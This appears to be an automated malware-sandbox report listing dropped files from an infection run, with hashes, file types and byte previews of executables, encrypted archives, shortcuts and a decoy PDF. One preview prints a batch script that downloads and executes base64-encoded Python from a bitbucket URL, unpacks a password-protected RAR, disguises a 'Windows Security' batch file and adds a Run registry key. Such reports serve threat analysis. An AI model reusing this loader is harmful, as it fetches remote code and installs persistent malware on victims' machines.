                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                      Entropy (8bit):3.9954559443759923
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8edkTI4sHMidAKZdA1seh/iZUkAQkqehvy+2:8tPh9Qay
                                                                                                                                                                                      MD5:45A2B9CCBD8215878040A82E44A5C4B0
                                                                                                                                                                                      SHA1:EC26B1B7853831CCC03F9CBEE322640276A84D53
                                                                                                                                                                                      SHA-256:C8F8A0C453E3CF067A9695A6257CE9B639FDD9E7BD7AA6D266D967264A3EB415
                                                                                                                                                                                      SHA-512:A76370BC24012769DA9247E629BF41B377F899D819A7115530C1F0CE4C92AC11761D161412D03C1734DB30F78465CA56BD70342C22A90BB8757149CAC155297D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......Q..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                      Entropy (8bit):4.001830557487126
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8VdkTI4AHMidAKZdA14meh7sFiZUkmgqeh7sZy+BX:8MPxnby
                                                                                                                                                                                      MD5:AB8E7F2542F0083712C5C73C87AEF58C
                                                                                                                                                                                      SHA1:F9923AE42DEB5F43F51D8AE62A1DB8E1EA1C906A
                                                                                                                                                                                      SHA-256:C7D9D73ACAE40D279AA870B04136013A9F1006481FFE6859B87AA7B548303897
                                                                                                                                                                                      SHA-512:2E62D7616D720A036221241CCC0165527E94CB3BCB1B92DEECA3C8865E17B42C5FD24860AC27AAD5DA5CCDB602D5CE06858FCD41B73060CB9C24E86618A2EB4E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 13:05:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                      Entropy (8bit):3.9897946733003407
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8XdkTI4sHMidAKZdA1TehDiZUkwqehTy+R:8aPSRy
                                                                                                                                                                                      MD5:E0DF7E98D5CE6C509371C1705F5549A3
                                                                                                                                                                                      SHA1:072B61D7973E6221E2D9B89D14CFC5AC01B40B7E
                                                                                                                                                                                      SHA-256:EC4F7B56EFFFFB3317D2F96B391F4097C4C9D29D35A5B28CFE3EEB7917CCA705
                                                                                                                                                                                      SHA-512:F67AFCDACAD1C81A7116AB372E4612AB14248B2F8163CA4E5821392121C7CF3B9A61FB8F4A05C3A5BBD0381C799A0E1AF35652B507A504E829FB5D86F19CFEFF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....3L..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 13:05:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                      Entropy (8bit):3.9770889223723263
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8odkTI4sHMidAKZdA1dehBiZUk1W1qehFy+C:8bPC9ly
                                                                                                                                                                                      MD5:2E0BF01D5C5676E9ED897AF52C445BE7
                                                                                                                                                                                      SHA1:35F6B93819B0540B5B7BE5A754CDFAB5F6F0592A
                                                                                                                                                                                      SHA-256:CEF1A578B5076B0BD47D44A5DDB02CB03ECD35BA6278DA5C71A224B644A33547
                                                                                                                                                                                      SHA-512:582DB7EB559E35E94C5EE6BD7579FDBB31BD15402B9BA69E26D7E96D4DFFE6D5BC6F7DE8C2200561A468E2960B31DBEC73AF38CA6DDD82DD8EC40C67EA6CA83B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....{WW..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 13:05:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                      Entropy (8bit):3.988324954301585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8fdkTI4sHMidAKZdA1duTeehOuTbbiZUk5OjqehOuTbby+yT+:8CPYTfTbxWOvTbby7T
                                                                                                                                                                                      MD5:893F8DED611D3E7976395E0BA1D8541B
                                                                                                                                                                                      SHA1:55ACBBD7121F2358FE7C9DC680F556AD2F7FC453
                                                                                                                                                                                      SHA-256:077BF79951B00538B83BD735D4D7712562A4983585E001E75EBB5A8CC4481420
                                                                                                                                                                                      SHA-512:5F2A8198C8CA4FBF025D5F5E6F309F25EE91BC73F1BA28D3989356C63B7C810135B0D71F1060DD3766E943AC10F6FDB155E72379E6130A8EBA238E99236C8EF3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......C..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):126299732
                                                                                                                                                                                      Entropy (8bit):7.999996800519757
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:3145728:gKH3MTGh4b0O0XHk2E3ob/VRHzP0jHKWYqtHGpLdfsGNC7c:Z+gE0XHksb/4jHbYqtHGdGGwc
                                                                                                                                                                                      MD5:CC33265A265DF9A1F966BAD6F64C8A13
                                                                                                                                                                                      SHA1:C97640FA78986503DECEF07476BEE7BB19D5D541
                                                                                                                                                                                      SHA-256:4E6759FF4301EFFA31C4C7A61AAB0DE57DD2403A88E6D6EC48EA14F4A03397D1
                                                                                                                                                                                      SHA-512:FEFDB1062ADF56713DA36D93283D52F84BA058488EA80D565CF553DAAAF38190A5DB72F65CD48AA36F99DBC090290EF831E25A84267B83979DE7B9AFD87F4BDF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:PK..........*YKv.<.....d......vcruntime140.dll...X......,...=***..5..>.:... ......A .....c..s...^.Mbn.k6c..A....%.D.1!I.`$.0*:.9.=.h.{.......hMwU.:u..S...d+%.(J..f..=...E.......{.S...f....o&,..+U....,.\.^.YXX..g.K.Bu^.z..D.....Y....E..UaK...N.JZ...E....H...../..0.<]..'U.G...G..HxJ..Q.\.w/..z../q.^.y....LM.0H2x.).8!l..B'..K)....).) ..&J_..?..I".E.<.G.m...@Q.......H.&..a..... ..(j'0j1u.?~R.......?..^....S$.*V.3..Z6++...G].C..ng(..yV....E.0..]pQ.JJKV`.eB.I.rI?p..E+(Rv................m>(.3.~.....3..........?*.)..df.i..u0....O9.H...6..?T8.DE.....H.B........<........."z.........O.y.C.y...(.Y.?.....<.D.c....b..?..`9..=.".?...?...._X6..?f.Q....)....4...3...j7..?M.S..........GZ.E......v.Cf.O.y.S......#r.'..OX....i...EDz...gd..........9.4..2.f.....W..O@...i...6+.....Zb...5.RA....UI.....)Tg.].].....L.S...^q/8.5;......bEvi.zu^QA&&S.T....-^<O..e....0....,u..YW......Q.....L...(........$;3.......ZW..*oE..R..=.Q*..g.eR.T.5.ZE....x/.....*...-.B..[../.|...
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6365288
                                                                                                                                                                                      Entropy (8bit):6.974813635942095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:98304:VZQIM+/nv/CDoAkYwpAa5ge1zZ/jtdZwUkQ:bJCKlA2VKUz
                                                                                                                                                                                      MD5:4864A55CFF27F686023456A22371E790
                                                                                                                                                                                      SHA1:6ED30C0371FE167D38411BFA6D720FCDCACC4F4C
                                                                                                                                                                                      SHA-256:08C7FB6067ACC8AC207D28AB616C9EA5BC0D394956455D6A3EECB73F8010F7A2
                                                                                                                                                                                      SHA-512:4BD3A16435CCA6CE7A7AA829EB967619A8B7C02598474E634442CFFC55935870D54D844A04496BF9C7E8C29C40FAE59AC6EB39C8550C091D06A28211491D0BFB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N..HN..HN..Hih.H\..HP.BHF..H..PHF..HG.SHu..HG.BH...HN..HQ..HG.EH...Hih.Hk..HN..H%..HG.OHw..HP.RHO..HG.WHO..HRichN..H........................PE..L...$7.Z.................z,...4...............,...@...........................b......a......................................W.|....._...............a.h...........@.,.............................H.U.@.............,.....\.W.@....................text...\y,......z,................. ..`.rdata...]+...,..^+..~,.............@..@.data...\.....W..<....W.............@....rsrc........._.......^.............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (552), with no line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                      Entropy (8bit):5.535105545831307
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Qsv7jJcb+yi1Br9nqn/RAfRwYpRJVzUIXRvH4EGM:v1Dr9qZA5wY/JFUGvBGM
                                                                                                                                                                                      MD5:9CAA7400EB49CB2A7FBDCCD6FCD274B5
                                                                                                                                                                                      SHA1:054BFD5C35B8F2B451E3D929B9E6337C5F51A00D
                                                                                                                                                                                      SHA-256:DBC59C8FF0FB702DC709EAA07914E2756A0A9C19E109B122196DE03738F40661
                                                                                                                                                                                      SHA-512:47D5181AA9DB183D3712F11297E8BFE5A3AB036B5F742283D9BE06AF2E694A2C4A325FA1B86ED7207B8EE7C17EED3778947F1EDB74736CB5EE08C0346CD4B604
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..&cls..cd /d "%~dp0"..set "CODE_LOADER=import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"..mkdir C:\Users\Public\QExvbmVOb25l..Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25l..echo C:\Users\Public\QExvbmVOb25l\synaptics.exe -c "%CODE_LOADER%" >> "C:\Users\Public\Windows Security"..echo //4mY2xzDQo= > "C:\Users\Public\Windows Security.~b64"..certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"..copy /b "C:\Users\Public\Windows Security.bat" /b + "C:\Users\Public\Windows Security" /b "C:\Users\Public\Windows Security.bat"..reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f..start "" /min "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "%CODE_
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:PDF document, version 1.4, 4 pages
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):285730
                                                                                                                                                                                      Entropy (8bit):7.813107378780199
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:nmZ5wjZbm4mnmOXc2OpZwQqBOunDf5VfwDkm3Y:nQWbm4mnmOo/w3HDRVf2Y
                                                                                                                                                                                      MD5:E0EA04FC5946F8CA5CA839EF94F095C2
                                                                                                                                                                                      SHA1:46CA5976FEB272CFCF5BCA9CB792F863672236FC
                                                                                                                                                                                      SHA-256:67D51F1F66C033FEAF0AF080706B885002B93BB230B8A94F362D933CB977453A
                                                                                                                                                                                      SHA-512:2A91D0458BF5E41EF24D076D3A3FA45E12EF741DF6E927816BE708E5F689C4A231F4935461018CF27CB4E63A528FEF171829B1F93B27E2CC38E4CB2668E925B0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:%PDF-1.4.%.....1 0 obj.<<./Type /Catalog./Version /1.4./Pages 2 0 R./StructTreeRoot 3 0 R./MarkInfo 4 0 R./Lang (vi-VN)./ViewerPreferences 5 0 R.>>.endobj.6 0 obj.<<./Title (Sr Agency Development Manager, Amazon Advertising)./Creator (Canva)./Producer (Canva)./CreationDate (D:20240905091403+00'00')./ModDate (D:20240905091402+00'00')./Keywords (DAGPvG5FqqI,BAEE3_RIMSI)./Author <FEFF004401B001A1006E0067002001101ED7>.>>.endobj.2 0 obj.<<./Type /Pages./Kids [7 0 R 8 0 R 9 0 R 10 0 R]./Count 4.>>.endobj.3 0 obj.<<./Type /StructTreeRoot./K [11 0 R]./ParentTree 12 0 R./ParentTreeNextKey 17.>>.endobj.4 0 obj.<<./Marked true./Suspects false.>>.endobj.5 0 obj.<<./Type /ViewerPreferences./DisplayDocTitle true.>>.endobj.7 0 obj.<<./Type /Page./Resources <<./ProcSet [/PDF /Text /ImageB /ImageC /ImageI]./ExtGState 13 0 R./XObject <<./X15 14 0 R./X16 15 0 R./X18 16 0 R.>>./Font 17 0 R.>>./MediaBox [0.0 7.8299813 595.5 850.07996]./Annots [18 0 R 19 0 R 20 0 R]./Contents 21 0 R./StructParents 0./Parent
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:RAR archive data, v5
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15730814
                                                                                                                                                                                      Entropy (8bit):7.999988305439088
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:393216:SJK2wD99MZUzM5HOkjEzngktJEh2NNLSlhh:WKHD99M3ji7lUhh
                                                                                                                                                                                      MD5:9BE5746001EB62B4CF9708B3459BAA5F
                                                                                                                                                                                      SHA1:A16AEC21EF30CAF14E224A82CF1F76D9BCB48F6F
                                                                                                                                                                                      SHA-256:DA662AB4FFE041774FF02E2C4FA584169AACE9EB893D3C91A346D21BD8DCDB51
                                                                                                                                                                                      SHA-512:254D6B1A693E534DA8467B2C5DDC76B316C7DA942A9B686ECC8627351DC37D63D911625E6624AFC87D7BD4EE0036E35E987078228F8AA56A9250B6009063BFA6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:Rar!.......d!.......-y~...k...'.eK./.6.l.V.......W..{Q........3...W.1....Q1g....uw..O.t..N..>.4T.x..LK=.).J..Z.4.l`.].L.E.`.8.n.....YH[.!..@...b5r...<..n..V..P.....O.7..{...w...0.....:U.aN.)....a.T|.=V.Z.OR...A.C...h..A..P&2...>TJH. ....Ho..a7..&...}../.....@....XtYM.............\..L0..QIfY....B.$.Y...U..2...1ym....U.......<..7...$...9.pB...?..B.......c.......7Oj#..o.}.U=`tD...a..g..O}5.[j.XV.s^..O..&........9.. .F...l..a.nk.........5..S:...r\.bSO@.....oV8+..^.a..d...+..v........q5..c.h.7g.F)..6..?..e....JJF..[:y.J.W......'...a._es..........X..v....C...8K.s..nj.9......./.1.a........1..E.w....,cQ5..8..E.....e..{9>p.nA...o..[....f`+L./.E.}.s.i...J......"%3....V.2`z/......g.....Z3..[..XT>u2"..M.."..2...G.C.].2.5.Z..74.*.qJ..<{.+Hb....;.R..mj....J..B6.n..Q_..?.N..........r5...U.[...*........rqf...!.P....*..Dnyj..b(..zq5Jh.%.X.E.dR......t.*+^...)...M.~a........Nu......+E...@.w.>..z?.....qy.CM@.}...w.@L.w.Y9..a.]-..j........L.}.....q........D
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):644184
                                                                                                                                                                                      Entropy (8bit):6.451035547006443
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:XxGICLbJbw9eVSeeUpG8dux9VF7qDtJQcBswj1POW4ddjh:mdbmeVSowh3VdqD/owpPODdjh
                                                                                                                                                                                      MD5:01F28B85ABF1993B7B14B3D15346F2E8
                                                                                                                                                                                      SHA1:DEC708FE5E44E77E1737C51B7A4A0422994D1F6F
                                                                                                                                                                                      SHA-256:B550465B9739594B6A193A16FA33F3CDDE3ECD4773FEB93E68C00FDBCF5EB8B8
                                                                                                                                                                                      SHA-512:DEA58D71EC8A0BF3BCBAA78CF54C957FA218F1842FE3FCB9C40D05B0C1E9A8DBF1D486036AD0EB04741E15149F93AFEC1B4878A0CD6B6A2B92FB9D00363AA14A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............|...|...|..Q....|..Q...f|..Q....|....b..|..e....|..e....|..e....|..e....|....v..|...|..^|..k...|..k....|..k....|..Rich.|..................PE..d.....td.........."....!. ...*.................@....................................d.....`.................................................4w..........H........F......XH......x.......T.......................(.......@............0...............................text............ .................. ..`.rdata..@Z...0...\...$..............@..@.data...l........4..................@....pdata...F.......H..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..x...........................@..B........................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):106954752
                                                                                                                                                                                      Entropy (8bit):7.999997411689233
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:3145728:VCekZB+qSZc9D7DR7rQhX2aU0FDsxP5XoCvURD:dkZB+w9DOhXJU0FDspiCAD
                                                                                                                                                                                      MD5:ECDA8204B6B5D1496F1AFF6D0D2D937D
                                                                                                                                                                                      SHA1:26579519D7FA5B5700608E31CE82141C42C894BC
                                                                                                                                                                                      SHA-256:9E9253A599613B18343ECB02094E7A0066EE081F9A6A64765B4128198CD9EF25
                                                                                                                                                                                      SHA-512:79B0099E91D391CFB9BA005595A9E5B0A3FE7C297BA85B9BE6BEE364305898B0423B2C3FE6790D872F0B9111DCFF64A42CC9357DADBA6BABF0C15E5ABB4B4D02
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{Y.....................W.......W.......W.......W.......................V.......V.......V.......V......Rich............................PE..L....,g...........!...).N...$.......S.......`............................................@.........................Po..x....p..d....................................c..p............................b..@............`...............................text....M.......N.................. ..`.rdata.......`.......R..............@..@.data...$............h..............@....rsrc................j..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):91272
                                                                                                                                                                                      Entropy (8bit):6.949159838323346
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:fDrhkJFRuE16nq2QoVj8gMaPTz7WHqQWZwg+AnecbGKjj9M9zfk/AJYpz7w:LdkpQMaPDWgD+wecbGkjk4vpnw
                                                                                                                                                                                      MD5:4F0F5649FFC133FA626589ED6111C30E
                                                                                                                                                                                      SHA1:65ACBA59815E6440C06C55C4457C601B5B22B0AD
                                                                                                                                                                                      SHA-256:A088131E8EB4E2178789AF49B646AB463CF9A1F48DA51698448206DF21DB5C95
                                                                                                                                                                                      SHA-512:526432F06A9105F29FD8E9C1814B5CA82880337A2DE0149ED9A15E250DA607047331C299FFFB41CB7486A4D61C543F459BF073E1187637FDED487019B5B0A04E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tm<[..o[..o[..o.m.nY..oRm.oP..o[..or..o...nM..o...nG..o...nH..o...nZ..o...oZ..o...nZ..oRich[..o........................PE..L....B............"!...(.....................................................P............@A................................. .......0...................P...@.. ....$..T............................#..@............ ...............................text............................... ..`.data...\...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.. ....@......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):126299732
                                                                                                                                                                                      Entropy (8bit):7.999996800519757
                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                      SSDEEP:3145728:gKH3MTGh4b0O0XHk2E3ob/VRHzP0jHKWYqtHGpLdfsGNC7c:Z+gE0XHksb/4jHbYqtHGdGGwc
